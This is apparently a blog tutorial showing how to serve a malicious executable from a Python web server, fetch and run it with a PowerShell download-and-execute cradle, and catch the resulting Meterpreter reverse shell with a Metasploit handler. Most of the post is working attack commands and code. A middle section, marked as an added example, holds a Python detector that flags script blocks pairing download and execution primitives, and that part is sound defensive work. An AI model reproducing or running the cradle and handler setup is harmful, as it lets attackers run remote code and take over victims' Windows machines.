Powershell – Download and execute .exe

Here’s a simple script that will download and run an executable file from within Powershell.

First let's serve up the file from our host machine. We can do this very quickly with Python. Go to the directory where the file is stored, right click and choose to open a terminal from there. This puts you in a terminal window whose working directory is already the directory of the file we want to serve up.

python3 -m http.server 8000

We now have a simple HTTP server running on port 8000, ready to serve up our malicious file.

Next, create a PowerShell script that will connect to this server, download the payload, and then execute it.

# Download the executable from the web server started above (same port, 8000)
$down = New-Object System.Net.WebClient
$url  = 'http://10.0.2.15:8000/MrBazza.exe'
$file = 'MrBazza.exe'
# A relative $file path is resolved against the process working directory
$down.DownloadFile($url, $file)

# Launch the downloaded file through the Shell.Application COM object
$exec = New-Object -ComObject Shell.Application
$exec.ShellExecute($file)

In the above code we connect to our server and download the executable file. It is saved under the designated filename, and we then execute it. Save this as a .ps1 file. Note that the port in the URL must match the port the Python server is listening on (8000 here).
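From the defender's side, the script above leaves a distinctive footprint in PowerShell script block logging (Windows event 4104): a download primitive and an execution primitive appear in the same block. The following is an added example, not code from the original post, that scans constructed script-block text for that pairing and extracts the URLs involved. The sample log blocks, the pattern tables and the function names are all assumptions made for this example.

```python
"""
Detection helper (added example): flag PowerShell script blocks that both
download content from the network and execute something, the signature of
a download-and-execute cradle. Input is plain script-block text such as the
ScriptBlockText field of event 4104; the samples below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Download primitives commonly used to fetch a payload (matched case-insensitively).
DOWNLOAD_PATTERNS = {
    "WebClient.DownloadFile": r"\.DownloadFile\s*\(",
    "WebClient.DownloadString": r"\.DownloadString\s*\(",
    "Invoke-WebRequest": r"\bInvoke-WebRequest\b|\biwr\b|\bwget\b|\bcurl\b",
    "Start-BitsTransfer": r"\bStart-BitsTransfer\b",
}

# Execution primitives that would run what was downloaded.
EXEC_PATTERNS = {
    "Shell.Application.ShellExecute": r"\.ShellExecute\s*\(",
    "Start-Process": r"\bStart-Process\b",
    "Invoke-Expression": r"\bInvoke-Expression\b|\biex\b",
    "Call operator on .exe": r"&\s*['\"]?[^'\"\s]+\.exe",
}

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


@dataclass
class Finding:
    block_id: str
    downloads: List[str]   # which download primitives matched
    executes: List[str]    # which execution primitives matched
    urls: List[str]        # URLs referenced in the block, for triage/blocking


def scan_block(block_id: str, text: str) -> Optional[Finding]:
    """Return a Finding when a block contains both a download and an execute primitive."""
    downloads = [name for name, pat in DOWNLOAD_PATTERNS.items()
                 if re.search(pat, text, re.IGNORECASE)]
    executes = [name for name, pat in EXEC_PATTERNS.items()
                if re.search(pat, text, re.IGNORECASE)]
    if downloads and executes:
        return Finding(block_id, downloads, executes, URL_RE.findall(text))
    return None


def scan_blocks(blocks: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of block id -> script text and keep only the suspicious ones."""
    findings = []
    for block_id, text in blocks.items():
        finding = scan_block(block_id, text)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample script blocks: one cradle like the script above,
# one download-only block and one execute-only block (both benign on their own).
SAMPLE_BLOCKS = {
    "block-1": (
        "$down = New-Object System.Net.WebClient\n"
        "$url  = 'http://10.0.2.15:8000/MrBazza.exe'\n"
        "$file = 'MrBazza.exe'\n"
        "$down.DownloadFile($url,$file)\n"
        "$exec = New-Object -com shell.application\n"
        "$exec.shellexecute($file)\n"
    ),
    "block-2": "Invoke-WebRequest -Uri 'https://intranet.example/report.csv' -OutFile report.csv\n",
    "block-3": "Start-Process notepad.exe -ArgumentList 'notes.txt'\n",
}


if __name__ == "__main__":
    for f in scan_blocks(SAMPLE_BLOCKS):
        print(f"{f.block_id}: download={f.downloads} execute={f.executes} urls={f.urls}")
```

Only block-1 is reported; the download-only and execute-only blocks are not, which keeps noise down on hosts where administrators legitimately fetch files or launch programs. In practice the URLs returned are what you would feed to proxy blocking or to a hunt across other endpoints, and the same pairing logic can be applied to command-line auditing (event 4688) when script block logging is not enabled.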

Finally, let's set up a Meterpreter handler on our host machine, ready to listen for the connection that comes back when the program is executed.

$ msfconsole 

Once the Metasploit console is open, we will start our handler.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.2.15
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

This will start Metasploit listening on 10.0.2.15:4444 for our incoming connection.

The screenshot below shows both of our open terminals: Metasploit and the Python web server.

Now we go over to our Windows machine and run our PowerShell script. It will connect to our host web server, then download and execute the file.

If we go back to our Linux machine, the Python web server's log shows the connection and the download of the file, and our Meterpreter session has started. We can get details on the machine by using

meterpreter > sysinfo 

So that is a quick and easy way to set up a web server with Python and serve up files that are automatically downloaded and executed by a PowerShell script.
